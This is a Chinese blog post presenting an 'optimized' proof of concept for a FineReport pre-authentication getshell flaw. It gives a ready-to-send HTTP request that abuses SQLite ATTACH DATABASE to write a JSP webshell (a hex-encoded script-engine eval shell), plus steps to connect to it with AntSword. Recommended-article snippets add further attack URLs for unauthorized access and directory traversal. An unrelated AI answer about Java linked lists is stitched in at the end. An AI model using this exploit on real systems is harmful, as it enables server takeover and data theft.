[漏洞复现]最新帆软前台getshell漏洞及优化poc

最新推荐文章于 2025-05-15 15:31:16 发布
最新推荐文章于 2025-05-15 15:31:16 发布
阅读量5.9k 收藏 5
点赞数 15
CC 4.0 BY-SA版权
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiangYueSec/article/details/140658260

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

前言

昨天看到各个地方都在发帆软的漏洞,看到poc后发现利用姿势应该是之前就有的,并且网上传的poc是写绝对路径,其实传相对路径就可以getshell。所以我们就对poc进行了一些小小的优化:

1、相对路径写入,可利用的环境更广,可无视系统和版本写入。

2、payload较短,直接蚁剑利用。

漏洞复现

漏洞原理y4tacker师傅也在自己的博客做了分享:某软Report高版本中利用的一些细节 (y4tacker.github.io)

我们这边主要对poc进行小小的优化。

GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

发送漏洞poc

漏洞利用成果后,写入文件为/webroot/aaa.jsp

可以利用蚁剑进行连接,添加get参数?a=javax.script.ScriptEngineManager,蚁剑连接密码为b,连接类型选择JSPJS

LiangYueSec
关注
报表 channel 反序列化漏洞复现
0xSec
11-27 8936
FineReport、FineBI 存在反序列化漏洞,攻击者可向 /webroot/decision/remote/design/channel 接口发送精心构造的反序列化数据,在目标服务器上执行任意代码,获取服务器权限。
数据决策系统漏洞_报表漏洞总结
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-24 4190
一、数据决策系统漏洞背景,FineReport报表件是件(中国)公司自主研发的一款纯Java编写的企业级web报表件。主要针对2012年7.0版本存在一些安全漏洞问题。 二、数据决策系统漏洞版本查看弱口令漏洞提供了访问此页面方法 三、数据决策系统漏洞漏洞总结 1.未授权访问漏洞 http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志 http://ip/Repo
V9 Getshell 漏洞
swordheart的博客
07-08 6172
0x00 任意文件上传漏洞【FineReport V9】0x01 漏洞描述此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动后默认存在的 JSP 文件0x02 漏洞详情 payload 替换成冰蝎的马,即可getshell0x03 临时修复建议排查是否使用系统,并同步在AF自定义禁止访问webroot/ReportServer路径。...
2025年最新POC集合来袭-漏洞挖掘如此容易
aheyor的博客
05-12 815
综上所述,漏洞自动化利用、AI在漏洞检测中的应用以及漏洞管理系统的实现,都是网络安全领域的重要研究方向。在网络安全领域,漏洞管理和利用技术是保障系统安全的重要手段。以下是关于漏洞自动化利用、AI在漏洞检测中的应用以及漏洞管理系统的详细分析。在网络安全领域,漏洞管理和利用技术是保障系统安全的重要手段。以下是关于漏洞自动化利用、AI在漏洞检测中的应用以及漏洞管理系统的详细分析。3、一键批量探测漏洞、实现自动漏洞挖掘和发现。4、漏洞盒子、补天、提交漏洞积分排名等你来拿。综上所述,漏洞自动化利用。
漏洞通报】最新工具RCE漏洞POC
guanjian_ci的博客
07-26 3003
1、删除 sqlite 驱动:请从工程的 webapps\webroot\WEB-INF\lib 目录中删除sqlite-jdbc-x.x.x.xjar驱动文件,并重启工程以完成更改。2、调整配置文件:在url.properties文件中,请添加以下规则:rule3=/view/ReportServer、rule4=/view/ReportServer/。3、安装 web 应用防火墙插件:请安装并配置相应的最新Web 应用防火墙插件。
HVV-某田相关经历
weixin_53884648的博客
04-17 863
一般我们的上机排查思路需要结合研判给的告警信息,如时间段,以及告警日志进行的操作,漏洞类型进行专项的排查。
FineReport/FineBI channel反序列化漏洞分析
热门推荐
errorr0
07-18 2万+
漏洞分析
报表 V8.0 组合拳漏洞分析及复现
2301_80115097的博客
12-15 6423
FineReport是一款企业级报表设计和数据可视化件,纯Java编写的企业级web报表工具。它提供了强大的报表设计、数据分析和数据可视化功能,旨在帮助企业用户轻松地创建高质量的报表和数据分析图表。
FineReport之channel反序列化漏洞复现的简单记录(不含EXP)
lostnerv的专栏
08-25 5737
FineReport 的包和BI不一样,无法原样照搬,最后还是自己找到了个利用链,可以实现任意文件上传,不知道有没有可以直接RCE的大佬,可以传授我下~~。
报表漏洞总结
weixin_51345872的博客
09-05 9824
仅供学习参考使用,任何违法事情与本人无关
FineReport()报表系统目录遍历漏洞复现和用简易过滤器处理
qq_34078582的博客
12-28 1万+
1.复现: 1.1直接通过浏览器访问以下地址 http://localhost:8080/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true ...
solly0880#wiki# V9 任意文件覆盖文件上传1
07-25
V9 任意文件覆盖文件上传漏洞描述 V9 存在任意文件覆盖,导致攻击者可以任意文件上传漏洞影响 V9漏洞复现
Thinkergod#PeiQi-WIKI-POC# V9 任意文件覆盖文件上传1
07-25
V9 任意文件覆盖文件上传漏洞描述 V9 存在任意文件覆盖,导致攻击者可以任意文件上传漏洞影响 V9漏洞复现
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
在部署应用程序时,应定期更新依赖库到最新版本,以便利用安全补丁来修复已知漏洞。 CVE-2024-38819漏洞的发现和PoC代码的提供,不仅为安全社区提供了漏洞研究和防范的重要信息,同时也提醒了开发者和运维人员在...
gentlexue#POC-3#Discuz 3.4 最新版后台getshell1
07-25
Discuz 3.4 最新版后台getshell详情可以看这篇文章:
bi反序列化漏洞利用工具 SSL证书问题
最新发布
blackzer0的博客
05-15 398
执行命令显示 sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target下载工具源码。
java实现判断俩个链表是否相交
03-08
<think>好的,我现在需要帮助用户了解如何用Java判断两个链表是否相交。首先,我得回想一下链表相交的定义。链表相交指的是两个链表在某个节点之后合并,形成共同的部分。也就是说,从相交节点开始,后续的所有节点都是相同的,直到链表结束。 接下来,我得确定用户的需求。用户可能正在学习数据结构,或者在面试准备中遇到了这个问题。他们需要具体的实现方法,而不仅仅是理论上的解释。因此,我应该提供清晰的思路和代码示例,同时考虑时间和空间复杂度。 首先,我得回顾常见的解决方法。常见的方法有两种:哈希表法和双指针法。哈希表法的思路是遍历第一个链表,将每个节点的引用存入哈希表,然后遍历第二个链表,检查是否有节点存在于哈希表中。这种方法的时间复杂度是O(m+n),空间复杂度也是O(m+n),其中m和n分别是两个链表的长度。 另一种方法是双指针法,也称为“走尾指针法”。这种方法不需要额外空间,时间复杂度同样是O(m+n)。具体步骤是:首先遍历两个链表,找到各自的尾节点,并记录长度。如果尾节点不同,说明不相交;如果相同,则计算两个链表的长度差,让较长的链表的指针先移动差值步,然后两个指针同时移动,直到相遇,相遇点即为相交节点。 用户可能更倾向于高效的方法,尤其是空间复杂度低的解决方案。因此,我应该重点解释双指针法,因为它更优。同时,我需要考虑链表可能存在的环的情况,但通常在这种情况下,题目假设链表无环,所以可能不需要处理环的问题,但最好在注意事项中提及。 然后,我需要考虑如何用Java实现双指针法。首先,定义链表节点的结构,通常是一个包含数据和next指针的类。然后,编写函数来检查相交。具体步骤包括遍历链表获取长度和尾节点,比较尾节点是否相同,调整指针起点,同步遍历直到找到相同节点。 在代码实现中,需要注意边界情况,例如其中一个链表为空,或者两个链表长度相差较大。此外,测试用例的构造也很重要,例如创建相交的链表和不相交的链表来验证代码的正确性。 可能用户还会有疑问,比如如何处理有环的情况,或者是否有其他方法。虽然问题通常假设链表无环,但可以简要说明如果有环的话需要先检测环,然后再处理相交的问题,但这会增加复杂度。 最后,总结思路和步骤,确保用户能够理解并实现该算法。同时,强调时间和空间复杂度,帮助用户评估不同方法的优劣。</think>--- 要判断两个链表是否相交,关键在于找到**相交节点**(两个链表的公共节点)。Java中可通过以下两种方法实现: --- ### 方法一:哈希表法 **核心思路**:遍历链表A,将所有节点存入哈希表,再遍历链表B,检查节点是否存在于哈希表中。 **时间复杂度**:$O(m + n)$,空间复杂度:$O(m)$(m、n为链表长度) ```java import java.util.HashSet; public class LinkedListIntersection { static class ListNode { int val; ListNode next; ListNode(int x) { val = x; } } public ListNode getIntersectionNode(ListNode headA, ListNode headB) { HashSet<ListNode> visited = new HashSet<>(); // 遍历链表A,存储所有节点 while (headA != null) { visited.add(headA); headA = headA.next; } // 遍历链表B,检查哈希表 while (headB != null) { if (visited.contains(headB)) { return headB; } headB = headB.next; } return null; } } ``` --- ### 方法二:双指针法(推荐) **核心思路**: 1. 若两链表相交,则**尾节点必相同** 2. 计算两链表长度差,对齐起点后同步遍历 **时间复杂度**:$O(m + n)$,空间复杂度:$O(1)$ ```java public class LinkedListIntersection { static class ListNode { int val; ListNode next; ListNode(int x) { val = x; } } public ListNode getIntersectionNode(ListNode headA, ListNode headB) { if (headA == null || headB == null) return null; // 计算链表A和B的长度 int lenA = getLength(headA), lenB = getLength(headB); // 对齐起点:长链表先走差值步 ListNode pA = headA, pB = headB; if (lenA > lenB) { for (int i = 0; i < lenA - lenB; i++) pA = pA.next; } else { for (int i = 0; i < lenB - lenA; i++) pB = pB.next; } // 同步遍历找交点 while (pA != null && pB != null) { if (pA == pB) return pA; pA = pA.next; pB = pB.next; } return null; } private int getLength(ListNode node) { int len = 0; while (node != null) { len++; node = node.next; } return len; } } ``` --- ### 方法三:巧妙双指针遍历(无长度计算) **核心思想**:两指针分别遍历A+B和B+A路径,最终会在交点相遇(若存在)。 ```java public ListNode getIntersectionNode(ListNode headA, ListNode headB) { if (headA == null || headB == null) return null; ListNode pA = headA, pB = headB; // 当pA和pB走过相同路径长度时: // - 若相交,会在交点相遇 // - 若不相交,最终同时为null退出循环 while (pA != pB) { pA = (pA == null) ? headB : pA.next; pB = (pB == null) ? headA : pB.next; } return pA; } ``` --- ### 验证相交的关键条件 1. **尾节点相同**:若两链表尾节点不同,则一定不相交 2. **节点引用相同**:判断相交的依据是节点对象地址相同,而非值相等 --- ### 测试用例示例 ```java public static void main(String[] args) { // 构造相交链表 ListNode common = new ListNode(8); common.next = new ListNode(4); common.next.next = new ListNode(5); ListNode headA = new ListNode(4); headA.next = new ListNode(1); headA.next.next = common; ListNode headB = new ListNode(5); headB.next = new ListNode(6); headB.next.next = new ListNode(1); headB.next.next.next = common; // 调用方法判断 ListNode result = getIntersectionNode(headA, headB); System.out.println(result != null ? "相交节点值:" + result.val : "不相交"); } ``` --- ### 复杂度对比 | 方法 | 时间复杂度 | 空间复杂度 | 适用场景 | |------------|------------|------------|--------------------| | 哈希表法 | $O(m+n)$ | $O(m)$ | 需要快速实现 | | 双指针法 | $O(m+n)$ | $O(1)$ | 内存敏感场景 | | 路径对齐法 | $O(m+n)$ | $O(1)$ | 代码简洁,无需长度 | --- ### 注意事项 1. 若链表可能有环,需先检测环再判断相交(经典相交问题通常假设无环) 2. 节点值可以重复,判断依据是节点引用地址相同而非值相等 3. 空链表直接返回`null`
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值